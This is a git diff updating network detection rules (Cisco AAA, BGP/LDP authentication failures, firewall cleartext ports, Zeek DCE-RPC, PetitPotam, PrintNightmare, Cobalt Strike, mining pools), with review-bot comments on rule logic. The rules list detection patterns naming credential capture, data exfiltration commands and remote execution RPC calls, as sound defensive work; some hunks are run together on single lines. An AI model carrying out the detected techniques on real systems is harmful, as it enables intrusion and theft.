--- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_input_capture.yml
+++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_input_capture.yml
@@ -4,22 +4,21 @@ status: test
 description: See what commands are being input into the device by other people, full credentials can be in the history
 author: Austin Clark
 date: 2019/08/11
-modified: 2021/11/27
+modified: 2023/01/04
+tags:
+ - attack.credential_access
+ - attack.t1552.003
 logsource:
- product: cisco
- service: aaa
- category: accounting
+ product: cisco
+ service: aaa
 detection:
- keywords:
- - 'show history'
- - 'show history all'
- - 'show logging'
- condition: keywords
+ keywords:
+ - 'show history'
+ - 'show history all'
+ - 'show logging'
+ condition: keywords
 fields:
- - CmdSet
+ - CmdSet
 falsepositives:
- - Not commonly run by administrators, especially if remote logging is configured
+ - Not commonly run by administrators, especially if remote logging is configured
 level: medium
-tags:
- - attack.credential_access
- - attack.t1552.003
diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_local_accounts.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_local_accounts.yml
index 4d579b008..678773565 100644
--- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_local_accounts.yml
+++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_local_accounts.yml
@@ -4,22 +4,21 @@ status: test
 description: Find local accounts being created or modified as well as remote authentication configurations
 author: Austin Clark
 date: 2019/08/12
-modified: 2021/11/27
+modified: 2023/01/04
+tags:
+ - attack.persistence
+ - attack.t1136.001
+ - attack.t1098
 logsource:
- product: cisco
- service: aaa
- category: accounting
+ product: cisco
+ service: aaa
 detection:
- keywords:
- - 'username'
- - 'aaa'
- condition: keywords
+ keywords:
+ - 'username'
+ - 'aaa'
+ condition: keywords
 fields:
- - CmdSet
+ - CmdSet
 falsepositives:
- - When remote authentication is in place, this should not change often
+ - When remote authentication is in place, this should not change often
 level: high
-tags:
- - attack.persistence
- - attack.t1136.001
- - attack.t1098
diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_modify_config.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_modify_config.yml
index dffc9bced..699678c94 100644
--- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_modify_config.yml
+++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_modify_config.yml
@@ -4,31 +4,30 @@ status: test
 description: Modifications to a config that will serve an adversary's impacts or persistence
 author: Austin Clark
 date: 2019/08/12
-modified: 2021/11/27
+modified: 2023/01/04
+tags:
+ - attack.persistence
+ - attack.impact
+ - attack.t1490
+ - attack.t1505
+ - attack.t1565.002
+ - attack.t1053
 logsource:
- product: cisco
- service: aaa
- category: accounting
+ product: cisco
+ service: aaa
 detection:
- keywords:
- - 'ip http server'
- - 'ip https server'
- - 'kron policy-list'
- - 'kron occurrence'
- - 'policy-list'
- - 'access-list'
- - 'ip access-group'
- - 'archive maximum'
- condition: keywords
+ keywords:
+ - 'ip http server'
+ - 'ip https server'
+ - 'kron policy-list'
+ - 'kron occurrence'
+ - 'policy-list'
+ - 'access-list'
+ - 'ip access-group'
+ - 'archive maximum'
+ condition: keywords
 fields:
- - CmdSet
+ - CmdSet
 falsepositives:
- - Legitimate administrators may run these commands
+ - Legitimate administrators may run these commands
 level: medium
-tags:
- - attack.persistence
- - attack.impact
- - attack.t1490
- - attack.t1505
- - attack.t1565.002
- - attack.t1053
diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_moving_data.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_moving_data.yml
index 138a0f3d4..a5068ab1d 100644
--- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_moving_data.yml
+++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_moving_data.yml
@@ -4,30 +4,29 @@ status: test
 description: Various protocols maybe used to put data on the device for exfil or infil
 author: Austin Clark
 date: 2019/08/12
-modified: 2021/11/27
+modified: 2023/01/04
+tags:
+ - attack.collection
+ - attack.lateral_movement
+ - attack.command_and_control
+ - attack.exfiltration
+ - attack.t1074
+ - attack.t1105
+ - attack.t1560.001
 logsource:
- product: cisco
- service: aaa
- category: accounting
+ product: cisco
+ service: aaa
 detection:
- keywords:
- - 'tftp'
- - 'rcp'
- - 'puts'
- - 'copy'
- - 'configure replace'
- - 'archive tar'
- condition: keywords
+ keywords:
+ - 'tftp'
+ - 'rcp'
+ - 'puts'
+ - 'copy'
+ - 'configure replace'
+ - 'archive tar'
+ condition: keywords
 fields:
- - CmdSet
+ - CmdSet
 falsepositives:
- - Generally used to copy configs or IOS images
+ - Generally used to copy configs or IOS images
 level: low
-tags:
- - attack.collection
- - attack.lateral_movement
- - attack.command_and_control
- - attack.exfiltration
- - attack.t1074
- - attack.t1105
- - attack.t1560.001
diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_net_sniff.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_net_sniff.yml
index a6d646dd1..e5063d4dc 100644
--- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_net_sniff.yml
+++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_net_sniff.yml
@@ -4,23 +4,22 @@ status: test
 description: Show when a monitor or a span/rspan is setup or modified
 author: Austin Clark
 date: 2019/08/11
-modified: 2021/11/27
+modified: 2023/01/04
+tags:
+ - attack.credential_access
+ - attack.discovery
+ - attack.t1040
 logsource:
- product: cisco
- service: aaa
- category: accounting
+ product: cisco
+ service: aaa
 detection:
- keywords:
- - 'monitor capture point'
- - 'set span'
- - 'set rspan'
- condition: keywords
+ keywords:
+ - 'monitor capture point'
+ - 'set span'
+ - 'set rspan'
+ condition: keywords
 fields:
- - CmdSet
+ - CmdSet
 falsepositives:
- - Admins may setup new or modify old spans, or use a monitor for troubleshooting
+ - Admins may setup new or modify old spans, or use a monitor for troubleshooting
 level: medium
-tags:
- - attack.credential_access
- - attack.discovery
- - attack.t1040
diff --git a/src/main/resources/rules/network/cisco/bgp/cisco_bgp_md5_auth_failed.yml b/src/main/resources/rules/network/cisco/bgp/cisco_bgp_md5_auth_failed.yml
new file mode 100644
index 000000000..c71615765
--- /dev/null
+++ b/src/main/resources/rules/network/cisco/bgp/cisco_bgp_md5_auth_failed.yml
@@ -0,0 +1,35 @@
+title: Cisco BGP Authentication Failures
+id: 56fa3cd6-f8d6-4520-a8c7-607292971886
+status: test
+description: Detects BGP failures which may be indicative of brute force attacks to manipulate routing
+references:
+ - https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf
+author: Tim Brown
+date: 2023/01/09
+modified: 2023/01/23
+tags:
+ - attack.initial_access
+ - attack.persistence
+ - attack.privilege_escalation
+ - attack.defense_evasion
+ - attack.credential_access
+ - attack.collection
+ - attack.t1078
+ - attack.t1110
+ - attack.t1557
+logsource:
+ product: cisco
+ service: bgp
+ definition: 'Requirements: cisco bgp logs need to be enabled and ingested'
+detection:
+ keywords_bgp_cisco:
+ '|all':
+ - ':179' # Protocol
+ - 'IP-TCP-3-BADAUTH'
+ condition: keywords_bgp_cisco
+fields:
+ - tcpConnLocalAddress
+ - tcpConnRemAddress
+falsepositives:
+ - Unlikely. Except due to misconfigurations
+level: low
diff --git a/src/main/resources/rules/network/cisco/ldp/cisco_ldp_md5_auth_failed.yml b/src/main/resources/rules/network/cisco/ldp/cisco_ldp_md5_auth_failed.yml
new file mode 100644
index 000000000..10800ba25
--- /dev/null
+++ b/src/main/resources/rules/network/cisco/ldp/cisco_ldp_md5_auth_failed.yml
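Review bot: The `':179'` entry under `keywords_bgp_cisco` is a substring match over the whole event, so it also matches text such as `:1790`–`:1799` or an IPv6 address fragment containing `:179`, while `'IP-TCP-3-BADAUTH'` on the next line already identifies the message on its own; either drop `':179'` or replace it with a field-based check on the port once the ingested field name is confirmed against a real log line. The nine tags (initial_access through collection, t1078, t1110, t1557) claim far more than a single MD5 authentication failure supports; `attack.credential_access` with `attack.t1110` is what the description (brute force) actually asserts, and the rest should be justified or removed. The same tag set is used verbatim in the new cisco_ldp_md5_auth_failed rule in the following hunk. `falsepositives` could also mention that an MD5 key rotation on one peer before the other produces exactly this message.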
@@ -0,0 +1,35 @@
+title: Cisco LDP Authentication Failures
+id: 50e606bf-04ce-4ca7-9d54-3449494bbd4b
+status: test
+description: Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels
+references:
+ - https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf
+author: Tim Brown
+date: 2023/01/09
+tags:
+ - attack.initial_access
+ - attack.persistence
+ - attack.privilege_escalation
+ - attack.defense_evasion
+ - attack.credential_access
+ - attack.collection
+ - attack.t1078
+ - attack.t1110
+ - attack.t1557
+logsource:
+ product: cisco
+ service: ldp
+ definition: 'Requirements: cisco ldp logs need to be enabled and ingested'
+detection:
+ selection_protocol:
+ - 'LDP'
+ selection_keywords:
+ - 'SOCKET_TCP_PACKET_MD5_AUTHEN_FAIL'
+ - 'TCPMD5AuthenFail'
+ condition: selection_protocol and selection_keywords
+fields:
+ - tcpConnLocalAddress
+ - tcpConnRemAddress
+falsepositives:
+ - Unlikely. Except due to misconfigurations
+level: low
diff --git a/src/main/resources/rules/network/firewall/net_firewall_cleartext_protocols.yml b/src/main/resources/rules/network/firewall/net_firewall_cleartext_protocols.yml
new file mode 100644
index 000000000..6bc0432ed
--- /dev/null
+++ b/src/main/resources/rules/network/firewall/net_firewall_cleartext_protocols.yml
@@ -0,0 +1,89 @@
+title: Cleartext Protocol Usage
+id: d7fb8f0e-bd5f-45c2-b467-19571c490d7e
+status: stable
+description: |
+ Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels.
+ Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access.
+references:
+ - https://www.cisecurity.org/controls/cis-controls-list/
+ - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf
+ - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf
+author: Alexandr Yampolskyi, SOC Prime, Tim Shelton
+date: 2019/03/26
+modified: 2022/10/10
+tags:
+ - attack.credential_access
+ # - CSC4
+ # - CSC4.5
+ # - CSC14
+ # - CSC14.4
+ # - CSC16
+ # - CSC16.5
+ # - NIST CSF 1.1 PR.AT-2
+ # - NIST CSF 1.1 PR.MA-2
+ # - NIST CSF 1.1 PR.PT-3
+ # - NIST CSF 1.1 PR.AC-1
+ # - NIST CSF 1.1 PR.AC-4
+ # - NIST CSF 1.1 PR.AC-5
+ # - NIST CSF 1.1 PR.AC-6
+ # - NIST CSF 1.1 PR.AC-7
+ # - NIST CSF 1.1 PR.DS-1
+ # - NIST CSF 1.1 PR.DS-2
+ # - ISO 27002-2013 A.9.2.1
+ # - ISO 27002-2013 A.9.2.2
+ # - ISO 27002-2013 A.9.2.3
+ # - ISO 27002-2013 A.9.2.4
+ # - ISO 27002-2013 A.9.2.5
+ # - ISO 27002-2013 A.9.2.6
+ # - ISO 27002-2013 A.9.3.1
+ # - ISO 27002-2013 A.9.4.1
+ # - ISO 27002-2013 A.9.4.2
+ # - ISO 27002-2013 A.9.4.3
+ # - ISO 27002-2013 A.9.4.4
+ # - ISO 27002-2013 A.8.3.1
+ # - ISO 27002-2013 A.9.1.1
+ # - ISO 27002-2013 A.10.1.1
+ # - PCI DSS 3.2 2.1
+ # - PCI DSS 3.2 8.1
+ # - PCI DSS 3.2 8.2
+ # - PCI DSS 3.2 8.3
+ # - PCI DSS 3.2 8.7
+ # - PCI DSS 3.2 8.8
+ # - PCI DSS 3.2 1.3
+ # - PCI DSS 3.2 1.4
+ # - PCI DSS 3.2 4.3
+ # - PCI DSS 3.2 7.1
+ # - PCI DSS 3.2 7.2
+ # - PCI DSS 3.2 7.3
+logsource:
+ category: firewall
+detection:
+ selection:
+ dst_port:
+ - 8080
+ - 21
+ - 80
+ - 23
+ - 50000
+ - 1521
+ - 27017
+ - 3306
+ - 1433
+ - 11211
+ - 15672
+ - 5900
+ - 5901
+ - 5902
+ - 5903
+ - 5904
+ selection_allow1:
+ action:
+ - forward
+ - accept
+ - 2
+ selection_allow2:
+ blocked: "false" # not all fws set action value, but are set to mark as blocked or allowed or not
+ condition: selection and 1 of selection_allow*
+falsepositives:
+ - Unknown
+level: low
diff --git a/src/main/resources/rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml b/src/main/resources/rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml
index 188fcef8b..ec3b2988a 100644
--- a/src/main/resources/rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml
+++ b/src/main/resources/rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml
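Review bot: `falsepositives: - Unknown` understates this rule: `selection` matches every accepted connection to port 80, 8080, 21 or 23 from any source, so ordinary browsing, package repositories and load-balancer health checks will hit it continuously, and the `status: stable` / `level: low` pairing suggests it is meant as an audit-style rule rather than an alert. Say so in the description (which is currently CIS-style policy text rather than a description of what is detected) and in falsepositives, e.g. `- Any legitimate HTTP, FTP, Telnet, VNC or database traffic that has not yet been moved to an encrypted equivalent`, or narrow `selection` with a source/destination zone field if the backend's firewall mapping exposes one. `blocked: "false"` in `selection_allow2` is a quoted string; if a firewall source emits a boolean, the match may depend on backend type coercion, so the inline comment should mention that or the rule should carry a test event.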
@@ -2,52 +2,52 @@ title: MITRE BZAR Indicators for Execution
 id: b640c0b8-87f8-4daa-aef8-95a24261dd1d
 status: test
 description: 'Windows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE'
-author: '@neu5ron, SOC Prime'
 references:
- - https://github.com/mitre-attack/bzar#indicators-for-attck-execution
+ - https://github.com/mitre-attack/bzar#indicators-for-attck-execution
+author: '@neu5ron, SOC Prime'
 date: 2020/03/19
 modified: 2021/11/27
+tags:
+ - attack.execution
+ - attack.t1047
+ - attack.t1053.002
+ - attack.t1569.002
 logsource:
- product: zeek
- service: dce_rpc
+ product: zeek
+ service: dce_rpc
 detection:
- op1:
- endpoint: 'JobAdd'
- operation: 'atsvc'
- op2:
- endpoint: 'ITaskSchedulerService'
- operation: 'SchRpcEnableTask'
- op3:
- endpoint: 'ITaskSchedulerService'
- operation: 'SchRpcRegisterTask'
- op4:
- endpoint: 'ITaskSchedulerService'
- operation: 'SchRpcRun'
- op5:
- endpoint: 'IWbemServices'
- operation: 'ExecMethod'
- op6:
- endpoint: 'IWbemServices'
- operation: 'ExecMethodAsync'
- op7:
- endpoint: 'svcctl'
- operation: 'CreateServiceA'
- op8:
- endpoint: 'svcctl'
- operation: 'CreateServiceW'
- op9:
- endpoint: 'svcctl'
- operation: 'StartServiceA'
- op10:
- endpoint: 'svcctl'
- operation: 'StartServiceW'
- condition: 1 of op*
+ op1:
+ endpoint: 'JobAdd'
+ operation: 'atsvc'
+ op2:
+ endpoint: 'ITaskSchedulerService'
+ operation: 'SchRpcEnableTask'
+ op3:
+ endpoint: 'ITaskSchedulerService'
+ operation: 'SchRpcRegisterTask'
+ op4:
+ endpoint: 'ITaskSchedulerService'
+ operation: 'SchRpcRun'
+ op5:
+ endpoint: 'IWbemServices'
+ operation: 'ExecMethod'
+ op6:
+ endpoint: 'IWbemServices'
+ operation: 'ExecMethodAsync'
+ op7:
+ endpoint: 'svcctl'
+ operation: 'CreateServiceA'
+ op8:
+ endpoint: 'svcctl'
+ operation: 'CreateServiceW'
+ op9:
+ endpoint: 'svcctl'
+ operation: 'StartServiceA'
+ op10:
+ endpoint: 'svcctl'
+ operation: 'StartServiceW'
+ condition: 1 of op*
 falsepositives:
- - Windows administrator tasks or troubleshooting
- - Windows management scripts or software
+ - Windows administrator tasks or troubleshooting
+ - Windows management scripts or software
 level: medium
-tags:
- - attack.execution
- - attack.t1047
- - attack.t1053.002
- - attack.t1569.002
diff --git a/src/main/resources/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml b/src/main/resources/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml
index 99f97de0b..a5bbc4c1a 100644
--- a/src/main/resources/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml
+++ b/src/main/resources/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml
@@ -2,38 +2,38 @@ title: MITRE BZAR Indicators for Persistence
 id: 53389db6-ba46-48e3-a94c-e0f2cefe1583
 status: test
 description: 'Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.'
-author: '@neu5ron, SOC Prime'
 references:
- - https://github.com/mitre-attack/bzar#indicators-for-attck-persistence
+ - https://github.com/mitre-attack/bzar#indicators-for-attck-persistence
+author: '@neu5ron, SOC Prime'
 date: 2020/03/19
 modified: 2021/11/27
+tags:
+ - attack.persistence
+ - attack.t1547.004
 logsource:
- product: zeek
- service: dce_rpc
+ product: zeek
+ service: dce_rpc
 detection:
- op1:
- endpoint: 'spoolss'
- operation: 'RpcAddMonitor'
- op2:
- endpoint: 'spoolss'
- operation: 'RpcAddPrintProcessor'
- op3:
- endpoint: 'IRemoteWinspool'
- operation: 'RpcAsyncAddMonitor'
- op4:
- endpoint: 'IRemoteWinspool'
- operation: 'RpcAsyncAddPrintProcessor'
- op5:
- endpoint: 'ISecLogon'
- operation: 'SeclCreateProcessWithLogonW'
- op6:
- endpoint: 'ISecLogon'
- operation: 'SeclCreateProcessWithLogonExW'
- condition: 1 of op*
+ op1:
+ endpoint: 'spoolss'
+ operation: 'RpcAddMonitor'
+ op2:
+ endpoint: 'spoolss'
+ operation: 'RpcAddPrintProcessor'
+ op3:
+ endpoint: 'IRemoteWinspool'
+ operation: 'RpcAsyncAddMonitor'
+ op4:
+ endpoint: 'IRemoteWinspool'
+ operation: 'RpcAsyncAddPrintProcessor'
+ op5:
+ endpoint: 'ISecLogon'
+ operation: 'SeclCreateProcessWithLogonW'
+ op6:
+ endpoint: 'ISecLogon'
+ operation: 'SeclCreateProcessWithLogonExW'
+ condition: 1 of op*
 falsepositives:
- - Windows administrator tasks or troubleshooting
- - Windows management scripts or software
+ - Windows administrator tasks or troubleshooting
+ - Windows management scripts or software
 level: medium
-tags:
- - attack.persistence
- - attack.t1547.004
diff --git a/src/main/resources/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml b/src/main/resources/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml
index 489e3932c..3ff369979 100644
--- a/src/main/resources/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml
+++ b/src/main/resources/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml
@@ -1,18 +1,19 @@
 title: Potential PetitPotam Attack Via EFS RPC Calls
 id: 4096842a-8f9f-4d36-92b4-d0b2a62f9b2a
+status: test
 description: |
 Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. The usage of this RPC function should be rare if ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..'
-status: experimental
-author: '@neu5ron, @Antonlovesdnb, Mike Remen'
-date: 2021/08/17
 references:
- - https://github.com/topotam/PetitPotam/blob/main/PetitPotam/PetitPotam.cpp
+ - https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp
 - https://msrc.microsoft.com/update-guide/vulnerability/ADV210003
 - https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf
 - https://threatpost.com/microsoft-petitpotam-poc/168163/
+author: '@neu5ron, @Antonlovesdnb, Mike Remen'
+date: 2021/08/17
+modified: 2022/11/28
 tags:
 - attack.t1557.001
 - attack.t1187
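Review bot: The `description` block scalar on the new side still ends with an unbalanced quote (`etc..'`) and carries the typos `refereed to as` and `Logs from from`; since this hunk already rewrites every other header key (status, references, author, date, modified), those three one-word fixes belong here rather than in a later cosmetic commit. The sentence `View surrounding logs (within a few minutes before and after) from the Source IP to.` is also cut off and should say what to compare the Source IP against.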
@@ -21,13 +22,8 @@ logsource:
 service: dce_rpc
 detection:
 selection:
- operation|startswith:
- - 'Efs'
- - 'efs'
+ operation|startswith: 'efs'
 condition: selection
-falsepositives:
- - Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description).
-level: medium
 fields:
 - id.orig_h
 - id.resp_h
@@ -36,3 +32,6 @@ fields:
 - endpoint
 - named_pipe
 - uid
+falsepositives:
+ - Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description).
+level: medium
diff --git a/src/main/resources/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml b/src/main/resources/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml
index b0cdb547f..1f7862a81 100644
--- a/src/main/resources/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml
+++ b/src/main/resources/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml
@@ -1,19 +1,23 @@
 title: Possible PrintNightmare Print Driver Install
 id: 7b33baef-2a75-4ca3-9da4-34f9a15382d8
+related:
+ - id: 53389db6-ba46-48e3-a94c-e0f2cefe1583
+ type: derived
+status: stable
 description: |
 Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675). The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.
-author: '@neu5ron (Nate Guagenti)'
-date: 2021/08/23
 references:
 - https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29
- - https://github.com/zeek/zeek/blob/master/scripts/base/protocols/dce-rpc/consts.zeek
+ - https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek
 - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527
 - https://github.com/corelight/CVE-2021-1675
- - https://github.com/SigmaHQ/sigma/blob/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml
 - https://old.zeek.org/zeekweek2019/slides/bzar.pdf
 - https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/
+author: '@neu5ron (Nate Guagenti)'
+date: 2021/08/23
+modified: 2022/07/07
 tags:
 - attack.execution
 - cve.2021.1678
@@ -32,9 +36,6 @@ detection:
 - 'RpcAddPrinterDriver' # "12345678-1234-abcd-ef00-0123456789ab",0x09
 - 'RpcAsyncAddPrinterDriver' # "76f03f96-cdfd-44fc-a22c-64950a001209",0x27
 condition: selection
-falsepositives:
- - Legitimate remote alteration of a printer driver.
-level: medium
 fields:
 - id.orig_h
 - id.resp_h
@@ -43,4 +44,6 @@ fields:
 - endpoint
 - named_pipe
 - uid
-status: stable
+falsepositives:
+ - Legitimate remote alteration of a printer driver.
+level: medium
diff --git a/src/main/resources/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml b/src/main/resources/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml
index 59b8daad8..3e3c14fb1 100644
--- a/src/main/resources/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml
+++ b/src/main/resources/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml
@@ -1,23 +1,23 @@
 title: SMB Spoolss Name Piped Usage
 id: bae2865c-5565-470d-b505-9496c87d0c30
+status: test
 description: Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.
-status: experimental
-author: OTR (Open Threat Research), @neu5ron
 references:
 - https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1
 - https://dirkjanm.io/a-different-way-of-abusing-zerologon/
 - https://twitter.com/_dirkjan/status/1309214379003588608
+author: OTR (Open Threat Research), @neu5ron
+date: 2018/11/28
+modified: 2022/10/09
 tags:
 - attack.lateral_movement
 - attack.t1021.002
-date: 2018/11/28
-modified: 2021/08/23
 logsource:
 product: zeek
 service: smb_files
 detection:
 selection:
- path|endswith: IPC$
+ path|endswith: 'IPC$'
 name: spoolss
 condition: selection
 falsepositives:
diff --git a/src/main/resources/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml b/src/main/resources/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml
index abcb28927..ff65bc439 100644
--- a/src/main/resources/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml
+++ b/src/main/resources/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml
@@ -1,22 +1,22 @@
 title: Default Cobalt Strike Certificate
 id: 7100f7e3-92ce-4584-b7b7-01b40d3d4118
+status: test
 description: Detects the presence of default Cobalt Strike certificate in the HTTPS traffic
-status: experimental
+references:
+ - https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468
 author: Bhabesh Raj
 date: 2021/06/23
-modified: 2021/08/24
-references:
- - https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468
+modified: 2022/10/09
 tags:
- - attack.command_and_control
- - attack.s0154
+ - attack.command_and_control
+ - attack.s0154
 logsource:
- product: zeek
- service: x509
+ product: zeek
+ service: x509
 detection:
- selection:
- certificate.serial: 8BB00EE
- condition: selection
+ selection:
+ certificate.serial: 8BB00EE
+ condition: selection
 fields:
 - san.dns
 - certificate.subject
diff --git a/src/main/resources/rules/network/zeek/zeek_dns_mining_pools.yml b/src/main/resources/rules/network/zeek/zeek_dns_mining_pools.yml
index 87868b483..a715f2934 100644
--- a/src/main/resources/rules/network/zeek/zeek_dns_mining_pools.yml
+++ b/src/main/resources/rules/network/zeek/zeek_dns_mining_pools.yml
@@ -1,19 +1,20 @@ title: DNS Events Related To Mining Pools id: bf74135c-18e8-4a72-a926-0e4f47888c19 +status: test description: Identifies clients that may be performing DNS lookups associated with common currency mining pools. -status: experimental references: - - https://github.com/Azure/Azure-Sentinel/blob/master/Detections/ASimDNS/imDNS_Miners.yaml -date: 2021/08/19 -modified: 2021/08/23 + - https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml author: Saw Winn Naung, Azure-Sentinel, @neu5ron -level: low +date: 2021/08/19 +modified: 2022/07/07 +tags: + - attack.execution + - attack.t1569.002 + - attack.impact + - attack.t1496 logsource: service: dns product: zeek -tags: - - attack.t1569.002 - - attack.t1496 detection: selection: query|endswith: @@ -93,9 +94,7 @@ detection: - '0.0.0.0' exclude_rejected: rejected: 'true' - condition: selection and not (exclude_answers or exclude_rejected) -falsepositives: - - A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is 'host' and ssl/tls is 'server_name'. + condition: selection and not 1 of exclude_* fields: - id.orig_h - id.resp_h @@ -103,3 +102,6 @@ fields: - answers - qtype_name - rcode_name +falsepositives: + - A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is 'host' and ssl/tls is 'server_name'. +level: low diff --git a/src/main/resources/rules/network/zeek/zeek_dns_nkn.yml b/src/main/resources/rules/network/zeek/zeek_dns_nkn.yml index 35c1bc3d6..6e96c4e49 100644 
--- a/src/main/resources/rules/network/zeek/zeek_dns_nkn.yml +++ b/src/main/resources/rules/network/zeek/zeek_dns_nkn.yml @@ -1,28 +1,28 @@ title: New Kind of Network (NKN) Detection id: fa7703d6-0ee8-4949-889c-48c84bc15b6f -status: experimental +status: test description: NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma> references: - - https://github.com/nknorg/nkn-sdk-go - - https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/ - - https://github.com/Maka8ka/NGLite -tags: - - attack.command_and_control + - https://github.com/nknorg/nkn-sdk-go + - https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/ + - https://github.com/Maka8ka/NGLite author: Michael Portera (@mportatoes) date: 2022/04/21 +tags: + - attack.command_and_control logsource: - product: zeek - service: dns + product: zeek + service: dns detection: - selection: - query|contains|all: - - 'seed' - - '.nkn.org' - condition: selection + selection: + query|contains|all: + - 'seed' + - '.nkn.org' + condition: selection fields: - id.orig_h - id.resp_h - answers falsepositives: - - Unknown + - Unknown level: low diff --git a/src/main/resources/rules/network/zeek/zeek_dns_susp_zbit_flag.yml b/src/main/resources/rules/network/zeek/zeek_dns_susp_zbit_flag.yml index 306a153b0..6f9485225 100644 --- a/src/main/resources/rules/network/zeek/zeek_dns_susp_zbit_flag.yml +++ b/src/main/resources/rules/network/zeek/zeek_dns_susp_zbit_flag.yml 
